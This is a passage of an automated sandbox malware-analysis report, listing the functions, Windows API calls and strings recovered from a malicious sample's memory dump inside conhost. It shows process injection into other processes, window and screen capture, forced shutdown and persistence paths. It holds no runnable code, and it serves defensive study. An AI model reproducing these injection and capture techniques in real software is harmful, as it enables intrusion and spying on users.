Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B571C
Part of subcall function 000B54A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 000B5735
Part of subcall function 000B54A9: RestoreDC.GDI32(00000000,?), ref: 000B5743
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B5756
Part of subcall function 000B54A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 000B5766
Part of subcall function 000B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 000B5778
Part of subcall function 000B54A9: TlsSetValue.KERNEL32(00000000), ref: 000B5792
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B57B2
Part of subcall function 000B54A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 000B57CE
Part of subcall function 000B54A9: SelectObject.GDI32(00000000,?), ref: 000B57E4
Part of subcall function 000B54A9: DeleteDC.GDI32(00000000), ref: 000B57EB
Part of subcall function 000B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B5813
Part of subcall function 000B54A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 000B5829

SetEvent.KERNEL32(000D2868,?,00000001), ref: 000B5C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 000B5C76

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BB0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB0B3
ReleaseMutex.KERNEL32(?), ref: 000BB0E7
IsWindow.USER32(?), ref: 000BB0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 000BB108
SendMessageW.USER32(?,00000215,00000000,?), ref: 000BB110

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B9009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 000B906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 000B90BB

Part of subcall function 000C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
Part of subcall function 000C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A
Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1
Part of subcall function 000C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
Part of subcall function 000C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

&, xrefs: 000B90A1
#, xrefs: 000B9093

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B98B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 000B991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000B996B

Part of subcall function 000C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
Part of subcall function 000C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A
Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1
Part of subcall function 000C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
Part of subcall function 000C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

&, xrefs: 000B994A
#, xrefs: 000B9951

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C7A14, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 000C7AB5

Strings

Global\, xrefs: 000C7A91
Local\, xrefs: 000C7A9A
p., xrefs: 000C7A41

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C2828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 000C35C6: MultiByteToWideChar.KERNEL32(000C2884,00000000,?,000C1FF2,?,7718F8FF,000C2884,00000000,00000032,?,7718F8FF,00000000), ref: 000C35DD

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000C28A1

Strings

SOFTWARE\Microsoft, xrefs: 000C2855
.dat, xrefs: 000C289B
C:\Users\admin\AppData\Roaming, xrefs: 000C2870, 000C2888

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BE0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 000BE108
GetThreadDesktop.USER32(00000000), ref: 000BE10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 000BE128

Part of subcall function 000BDD09: TlsAlloc.KERNEL32(000D2868,00000000,0000018C,00000000,00000000), ref: 000BDD22
Part of subcall function 000BDD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 000BDD4A
Part of subcall function 000BDD09: CreateEventW.KERNEL32(000D2C30,00000001,00000000,?,84889912,?,00000001), ref: 000BDD74
Part of subcall function 000BDD09: CreateMutexW.KERNEL32(000D2C30,00000000,?,18782822,?,00000001), ref: 000BDD97
Part of subcall function 000BDD09: CreateFileMappingW.KERNEL32(00000000,000D2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 000BDDC2
Part of subcall function 000BDD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 000BDDD8
Part of subcall function 000BDD09: GetDC.USER32(00000000), ref: 000BDDF5
Part of subcall function 000BDD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 000BDE15
Part of subcall function 000BDD09: GetDeviceCaps.GDI32(?,0000000A), ref: 000BDE1F
Part of subcall function 000BDD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 000BDE32
Part of subcall function 000BDD09: ReleaseDC.USER32(00000000,?), ref: 000BDE56
Part of subcall function 000BDD09: CreateMutexW.KERNEL32(000D2C30,00000000,?,1898B122,?,00000001,000D28B8,?,00000102,000D28A4,000D2E70,00000010,?,?), ref: 000BDF00
Part of subcall function 000BDD09: GetDC.USER32(00000000), ref: 000BDF15
Part of subcall function 000BDD09: CreateCompatibleDC.GDI32(00000000), ref: 000BDF23
Part of subcall function 000BDD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 000BDF3A
Part of subcall function 000BDD09: SelectObject.GDI32(00000000,00000000), ref: 000BDF4D
Part of subcall function 000BDD09: ReleaseDC.USER32(00000000,00000001), ref: 000BDF65

Part of subcall function 000BDF74: DeleteObject.GDI32(00000000), ref: 000BDF87
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDF97
Part of subcall function 000BDF74: TlsFree.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFA2
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDFB0
Part of subcall function 000BDF74: UnmapViewOfFile.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFBA
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDFC7
Part of subcall function 000BDF74: SelectObject.GDI32(00000000,00000000), ref: 000BDFE1
Part of subcall function 000BDF74: DeleteObject.GDI32(00000000), ref: 000BDFF2
Part of subcall function 000BDF74: DeleteDC.GDI32(00000000), ref: 000BDFFF
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BE010
Part of subcall function 000BDF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000BE01F
Part of subcall function 000BDF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 000BE038

Strings

N, xrefs: 000BE132

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(000D25D0), ref: 000B5F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 000B5F23

Part of subcall function 000C89C2: PathSkipRootW.SHLWAPI(?), ref: 000C89CD
Part of subcall function 000C89C2: GetFileAttributesW.KERNEL32(?,?,00000000,000CD261,?,?,?,?,?), ref: 000C89F5
Part of subcall function 000C89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000CD261,?,?,?,?,?), ref: 000C8A03

Part of subcall function 000C6A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 000C6A5B
Part of subcall function 000C6A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 000C6A77
Part of subcall function 000C6A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 000C6A8E
Part of subcall function 000C6A3C: LocalFree.KERNEL32(00000000), ref: 000C6A9D

GetFileAttributesW.KERNEL32(000D23C8,000D25D0,000D25D0,00000000,00020000,000B69C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 000B5F46

Part of subcall function 000C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000C28A1

Strings

.tmp, xrefs: 000B5F1D

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C87C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 000C87D7

Part of subcall function 000C46F4: GetTickCount.KERNEL32(000C8766,?), ref: 000C46F4

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 000C8829

Strings

%s%08x, xrefs: 000C87F2
tmp, xrefs: 000C87ED

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C89C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 000C89CD
GetFileAttributesW.KERNEL32(?,?,00000000,000CD261,?,?,?,?,?), ref: 000C89F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000CD261,?,?,?,?,?), ref: 000C8A03

Strings

.exe, xrefs: 000C89C9

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BF367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 000BF3CC

Part of subcall function 000CD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 000CD34A
Part of subcall function 000CD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 000CD35D
Part of subcall function 000CD325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 000CD39B
Part of subcall function 000CD325: CharToOemW.USER32(?,?), ref: 000CD3B7
Part of subcall function 000CD325: CharToOemW.USER32(?,?), ref: 000CD3C6
Part of subcall function 000CD325: ExitProcess.KERNEL32(00000000), ref: 000CD41C

Part of subcall function 000BE959: CreateMutexW.KERNELBASE(000D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,000B4E69,?,?,?,743C152E,00000002), ref: 000BE97F

ExitWindowsEx.USER32(00000014,80000000), ref: 000BF3DF

Part of subcall function 000C4A87: GetCurrentThread.KERNEL32(00000020,00000000,000CC9A1,00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A97
Part of subcall function 000C4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A9E
Part of subcall function 000C4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,000CC9A1,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4AB0
Part of subcall function 000C4A87: LookupPrivilegeValueW.ADVAPI32(00000000,000CC9A1,?), ref: 000C4AD4
Part of subcall function 000C4A87: AdjustTokenPrivileges.ADVAPI32(000CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 000C4AE9
Part of subcall function 000C4A87: GetLastError.KERNEL32 ref: 000C4AF3
Part of subcall function 000C4A87: CloseHandle.KERNEL32(000CC9A1), ref: 000C4B02

Strings

SeShutdownPrivilege, xrefs: 000BF3AB
, xrefs: 000BF383

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C1E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 000C1E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 000C1E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 000C1E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 000C1E3D, 000C1E42, 000C1E59

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,000C1DBB,00000000,000C22ED), ref: 000C4BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,000C1DBB,00000000,000C22ED), ref: 000C4BDF

Strings

kernel32.dll, xrefs: 000C4BCA
IsWow64Process, xrefs: 000C4BD9

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CA24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(000D3F24), ref: 000CA265
SetEvent.KERNEL32(?), ref: 000CA286
LeaveCriticalSection.KERNEL32(000D3F24), ref: 000CA28D

Strings

3, xrefs: 000CA256

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C0AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0CB5

Part of subcall function 000C3346: HeapAlloc.KERNEL32(00000008,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?,?), ref: 000C3368
Part of subcall function 000C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?), ref: 000C3379

Part of subcall function 000C4660: CryptAcquireContextW.ADVAPI32(000C8C87,00000000,00000000,00000001,F0000040,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C4679
Part of subcall function 000C4660: CryptCreateHash.ADVAPI32(000C8C87,00008003,00000000,00000000,00000030,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C4691
Part of subcall function 000C4660: CryptHashData.ADVAPI32(00000030,00000010,000C8C87,00000000,?,000C8C87), ref: 000C46AD
Part of subcall function 000C4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,000C8C87), ref: 000C46C5
Part of subcall function 000C4660: CryptDestroyHash.ADVAPI32(00000030,?,000C8C87), ref: 000C46DC
Part of subcall function 000C4660: CryptReleaseContext.ADVAPI32(000C8C87,00000000,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C46E6

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BA088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 000BA12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000BA159
RegCloseKey.ADVAPI32(?), ref: 000BA28F

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

Part of subcall function 000C7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,000C9E26,?,?), ref: 000C75AD

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 000BA27C

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BA61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 000BA6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000BA6D5
RegCloseKey.ADVAPI32(?), ref: 000BA80C

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

Part of subcall function 000C7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,000C9E26,?,?), ref: 000C75AD

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 000BA7F9

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CB265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000CB28C

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 000CB2E0

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 000CB343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 000CB36F

Part of subcall function 000CB3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 000CB437
Part of subcall function 000CB3EC: WriteFile.KERNEL32(000CB3D4,?,00000146,?,00000000), ref: 000CB475
Part of subcall function 000CB3EC: WriteFile.KERNEL32(000CB3D4,?,00000000,?,00000000), ref: 000CB499
Part of subcall function 000CB3EC: FlushFileBuffers.KERNEL32(000CB3D4), ref: 000CB4AD
Part of subcall function 000CB3EC: CloseHandle.KERNEL32(000CB3D4), ref: 000CB4B6

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C7D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(000B0000,?), ref: 000C7D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 000C7D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,000B0000,?,?,00000000,?,00000000), ref: 000C7DE0

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,000B0000,?,?,00000000,?,00000000), ref: 000C7E05

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C2542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 000C7D14: IsBadReadPtr.KERNEL32(000B0000,?), ref: 000C7D30
Part of subcall function 000C7D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 000C7D4E
Part of subcall function 000C7D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,000B0000,?,?,00000000,?,00000000), ref: 000C7DE0
Part of subcall function 000C7D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,000B0000,?,?,00000000,?,00000000), ref: 000C7E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 000C2574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,000C316D,?,00000000,?,?,00000000), ref: 000C25AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,000C316D,?,00000000,?,?,00000000), ref: 000C25CB

Part of subcall function 000C1D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 000C1D3B
Part of subcall function 000C1D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,000C25E9,00000000,?,?,?,?,000C316D,?), ref: 000C1D4F
Part of subcall function 000C1D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 000C1D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,000C316D,?,00000000), ref: 000C261A

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(000B15B0,00000000,00004401,000B15A0,?), ref: 000C9874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,000B85BE,?,?), ref: 000C98C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,000B85BE,?,?), ref: 000C98D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,000B85BE,?,?), ref: 000C9909

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C9372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 000C86BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000C86D4

Part of subcall function 000C869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 000C86B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 000C93F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 000C940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 000C9430
FlushFileBuffers.KERNEL32(?), ref: 000C9438

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 000B5B40

Part of subcall function 000C4DCA: CloseHandle.KERNEL32(00000000), ref: 000C4DD9
Part of subcall function 000C4DCA: CloseHandle.KERNEL32(00000000), ref: 000C4DE2

Part of subcall function 000C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000C28A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 000B5B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 000B5BD6
TerminateProcess.KERNEL32(?,00000000), ref: 000B5BE3

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BBB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 000C2507: CreateMutexW.KERNEL32(000D2C30,00000000,?,?,?,?,?), ref: 000C2528

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 000BBB89
SetThreadPriority.KERNEL32(00000000), ref: 000BBB90
WaitForSingleObject.KERNEL32(00001388), ref: 000BBBA8

Part of subcall function 000C31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C31ED
Part of subcall function 000C31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 000C3216
